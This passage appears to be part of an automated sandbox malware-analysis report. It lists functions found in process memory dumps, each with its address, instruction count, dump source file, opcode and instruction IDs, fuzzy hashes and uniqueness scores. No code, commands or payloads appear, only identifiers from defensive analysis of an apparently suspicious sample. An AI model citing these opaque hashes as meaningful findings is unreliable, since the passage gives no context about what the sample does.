                                                                                                                                      • Instruction Fuzzy Hash: 9B31B270E15A2E8FEBB5EB54C858BB8B2F5AF58711F4140F9901DA22A5DE795BC0CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C437E Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 324f2d527dd0b7f18f9e5644cfd7639261bb033597ece5a4e3318b2cad7074bc
                                                                                                                                      • Instruction ID: dbf7347a426401c9ed45e3dfb7656ba906df34712e4d3a6167629d200864b5fb
                                                                                                                                      • Opcode Fuzzy Hash: 324f2d527dd0b7f18f9e5644cfd7639261bb033597ece5a4e3318b2cad7074bc
                                                                                                                                      • Instruction Fuzzy Hash: 8521D670A0A50D8FEB68EF94D464BBCB7B1EF5C301F1540AEC01AE76A1CA756A918F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8811BE Relevance: .1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0e4cb51344d0706c2ea5a89117e2fe09538f1bebe36d77bf7c481a95099bddb0
                                                                                                                                      • Instruction ID: 759309d2e06940471acacc2a30483c055598292ffd00a683570a718ddecf01c4
                                                                                                                                      • Opcode Fuzzy Hash: 0e4cb51344d0706c2ea5a89117e2fe09538f1bebe36d77bf7c481a95099bddb0
                                                                                                                                      • Instruction Fuzzy Hash: 3A210930A1491E8FDB95EFA8C8949ADB7F1FF5C301B110579D019D72A5DF34A940CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88CF71 Relevance: .1, Instructions: 63COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction ID: 4cf3af5b588c8a442b5d1b14a9f4ea50ed4730b38f7b77a8e7f77ca71cd57a76
                                                                                                                                      • Opcode Fuzzy Hash: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction Fuzzy Hash: E021F770E1AA2E8BEBB5DB44C8587B8B2B4AF08710F5100F9901DA22A5DE785B859F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B88D111 Relevance: .1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b886000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction ID: 31c1b156c719dda4b815592b4d5bae18cd24671fdbb7f9a543161bfbbb9cc49d
                                                                                                                                      • Opcode Fuzzy Hash: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction Fuzzy Hash: 9B21D670919A2E8BEBA9EB54C8687E8B2B5EB18700F4140F9D01DA26A5DE741BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8829D2 Relevance: .1, Instructions: 59COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction ID: 5bcad2d36417e4acf57804fd8a51fc78058f32ef981fe4410ba3c1b97169cc86
                                                                                                                                      • Opcode Fuzzy Hash: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction Fuzzy Hash: 04213870A09A1E8FEB60EB18C9986E8B3B1EF58711F0001E9D05DD22A5DE741B818F40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CCDA3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 201d4c8de19de2d742243d63733d0f70c06825d420d0090359b6f6f88f554522
                                                                                                                                      • Instruction ID: 6e05498b3477c00df09f523263bb5e3317909baf2c6e909e5232328136951355
                                                                                                                                      • Opcode Fuzzy Hash: 201d4c8de19de2d742243d63733d0f70c06825d420d0090359b6f6f88f554522
                                                                                                                                      • Instruction Fuzzy Hash: 0811F670E0951D8EDBA4EB98C4687FCB7B1EB4D300F50417AD00DE2292CB342AA18F45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896E61 Relevance: .0, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction ID: 7a6fa9905f4e44543e29366a2969c39baa6a3bf13af353baf42f8cee324a9012
                                                                                                                                      • Opcode Fuzzy Hash: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction Fuzzy Hash: 84014470A1968C8FCF85EF18C895AD93BF0FF19304F0501AAE848C3261DB34E950CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B897355 Relevance: .0, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 35172419fc182df2dfd9ad9c87f61a9739c03fddc7ad051f99e9d599b48a814e
                                                                                                                                      • Instruction ID: c5eaccce5b8d736a262c8273d50f5a3673ec1fa62866a38663b0d1f7ac4e1151
                                                                                                                                      • Opcode Fuzzy Hash: 35172419fc182df2dfd9ad9c87f61a9739c03fddc7ad051f99e9d599b48a814e
                                                                                                                                      • Instruction Fuzzy Hash: C9017834909A8DCFCF54DF1888525E93BF0FF68740F4102AAE848C7291D738E654CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 11a4b6e7eec11c049b54d652e8c15d78112014800c0d597ba3bb8d2560c48f6f
                                                                                                                                      • Instruction ID: 2cbdd16fece958d0dfc0cffb74611a3d309c18432fd8d361b3aaa649d8f25359
                                                                                                                                      • Opcode Fuzzy Hash: 11a4b6e7eec11c049b54d652e8c15d78112014800c0d597ba3bb8d2560c48f6f
                                                                                                                                      • Instruction Fuzzy Hash: 0801F571E0E68E8FE7129BA4C8242EE77B1EF46310F0641B3D421DB1E6DA382A18C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC2C9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6e3e8f2723d3ee86a83ef16725ef6eca99e20160e926cfb7f6a601edc81fe28f
                                                                                                                                      • Instruction ID: ff26f1d82fbe2db0ca0924a9f670352958baa6b01d9e01e0a803715f8031b9c4
                                                                                                                                      • Opcode Fuzzy Hash: 6e3e8f2723d3ee86a83ef16725ef6eca99e20160e926cfb7f6a601edc81fe28f
                                                                                                                                      • Instruction Fuzzy Hash: AE01D47090968D8FDB55EF6488692A97BB0FF19300F4505FBE40CC71A2DA389584CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CECF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4ed2b39ea08d3d677964ef13ddd6d378471464c24b3468ea4d2ac87a5759515f
                                                                                                                                      • Instruction ID: 78091d3a527ecf9c48b757bd3757e656d2a96115e4d68395ec051c19f387c09b
                                                                                                                                      • Opcode Fuzzy Hash: 4ed2b39ea08d3d677964ef13ddd6d378471464c24b3468ea4d2ac87a5759515f
                                                                                                                                      • Instruction Fuzzy Hash: 610192B190968D8FEB56EF6888692A97FF0FF29201F4905EBD508C61A2D6389544CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC25D Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5a96fc725eb85afc5c0684234b9746260c445ed3c0742d589c1b54d16a4b38a3
                                                                                                                                      • Instruction ID: 65ec40b737976c6557684a38af57fb73d333537356491900b4def57312f5f1dd
                                                                                                                                      • Opcode Fuzzy Hash: 5a96fc725eb85afc5c0684234b9746260c445ed3c0742d589c1b54d16a4b38a3
                                                                                                                                      • Instruction Fuzzy Hash: 5201D67090564E8FEB94EF6888596E97BF0FF28300F8445B7E40CC61A1EE389294CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF2D3 Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6e6f5e5f975ca6d5b017e9c385d1077939def9dd14460ba192c74861aa11c080
                                                                                                                                      • Instruction ID: cc41fccc5eee980828cbd7207e3989dc2a1e812c7e12d78f5379edc60b5bdaa9
                                                                                                                                      • Opcode Fuzzy Hash: 6e6f5e5f975ca6d5b017e9c385d1077939def9dd14460ba192c74861aa11c080
                                                                                                                                      • Instruction Fuzzy Hash: 7EF0FF3085E6C8AFDB02AB708C686E97FF0EF56304F4A85E7E458C60A2D62C5658C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B4741 Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 14fa37649b4ab9341cfa7376d650f2b13ba2573d2435d3ba6d2d740870f9e7e7
                                                                                                                                      • Instruction ID: 65d977afed0a5801498614cd023b5ad3082cfd0ee6c466f45a1458a549bc1d5d
                                                                                                                                      • Opcode Fuzzy Hash: 14fa37649b4ab9341cfa7376d650f2b13ba2573d2435d3ba6d2d740870f9e7e7
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0CD7090978D8FDB55EF6488556E97FF0FF18300F0500EBE818C61A2DB34A194CB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC671 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 468d883320a4118a7b0c64abc3a0719d4d9432293d59226644dfbf23bcd94939
                                                                                                                                      • Instruction ID: 8a9e91f8de9334f9f2a986da5e238bddab8e40a765d6fbb51764a20fdfd14768
                                                                                                                                      • Opcode Fuzzy Hash: 468d883320a4118a7b0c64abc3a0719d4d9432293d59226644dfbf23bcd94939
                                                                                                                                      • Instruction Fuzzy Hash: 93F0F6B190968D8FEB55EF6488256E97BA0FF14200F0501F7F81CC31E2DA389651CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CED69 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8100577cb69015dce602efe059567ffd6a7d63c622fb6b01cf6b43f8b3be0f80
                                                                                                                                      • Instruction ID: ce45c6d76414d33c623f3a66cc4920343469bcd2408c38b68f028f215e0eada7
                                                                                                                                      • Opcode Fuzzy Hash: 8100577cb69015dce602efe059567ffd6a7d63c622fb6b01cf6b43f8b3be0f80
                                                                                                                                      • Instruction Fuzzy Hash: 2DF0A9B190E7C94FDB666B644C721A43FA0FF56200F0A01FBE55CC65E3EA596554C342
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CEC8D Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 308753c81c4ed24580bccfe1f6015ce5aac6ea675fe2e557f54a78506b5b64e3
                                                                                                                                      • Instruction ID: f54a7f6c8cc12be5e3c624929d6bd529201828ddeb39b2a10fb2df8d6cfc20ab
                                                                                                                                      • Opcode Fuzzy Hash: 308753c81c4ed24580bccfe1f6015ce5aac6ea675fe2e557f54a78506b5b64e3
                                                                                                                                      • Instruction Fuzzy Hash: 4501A77091568D8FDB55EF6484596A97BF0FF28301F4545B7E41CC21A2DA389154CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CFF4A Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: be844ee73782254d843ba0106ae1acb64ac760d0658eec497f7c0a53d22df91a
                                                                                                                                      • Instruction ID: c02ff81514174b20424ebe76b2fb022ebbae5447f436f3afe55544fbae68a548
                                                                                                                                      • Opcode Fuzzy Hash: be844ee73782254d843ba0106ae1acb64ac760d0658eec497f7c0a53d22df91a
                                                                                                                                      • Instruction Fuzzy Hash: F2016930A1840D8FEB28EB80C894BBCB7B1FF58310F644176D00997295CF38AA868B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C40C9 Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction ID: e8223933e4b58500a1fa8c459c32049b07d46802e10036b51b581d7459f2ef9c
                                                                                                                                      • Opcode Fuzzy Hash: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction Fuzzy Hash: 5B01FB7091868D8FDB91EF68C959A993BF0FF69300F4501E7E418C7262D634D554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA840 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction ID: 67814f8608110dbd8af8a14e58ad2d40f419479488908825857ada116beaab6e
                                                                                                                                      • Opcode Fuzzy Hash: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction Fuzzy Hash: CFF068B090464E9FEB55FF6884596F977E0FF28301F5005B7E81CC25A1DA346190CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC529 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction ID: 024fe9052e7497a436231e6f6d3c1961b2c317edd63609164fa037ddf95308d8
                                                                                                                                      • Opcode Fuzzy Hash: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction Fuzzy Hash: DCF0CDB190E7C94FE7669B644C791A43FA0FF56300F0A05EBE45CC71E3D9199954C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8962AD Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction ID: 97dd3f907e22862dc1ec1384590def3c0e1e7a5c2525b5200195e096127bc343
                                                                                                                                      • Opcode Fuzzy Hash: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction Fuzzy Hash: BEF06D7090968E8FCF92DF58C895A993BA0FF69340F0502AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9C5E Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b7000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction ID: c181dff1414412c58870333471d4a10c9ee915101c2f5a4f66a7d5cd1be1f47c
                                                                                                                                      • Opcode Fuzzy Hash: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction Fuzzy Hash: D0F03C3091978D9FDB559F7488685A97FF0FF09204F4544EBD808C61A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B04F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8b0000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction ID: 327074ae39ff5c3e932352623ea41117dcdd2ccab5956ff2ecde4c4049c9bf0b
                                                                                                                                      • Opcode Fuzzy Hash: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction Fuzzy Hash: CA018C7091D78D8FDB56DF2488A9AA97FF0FF19304F4500EBE808C62A6D6389594CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896ACD Relevance: .0, Instructions: 35COMMON
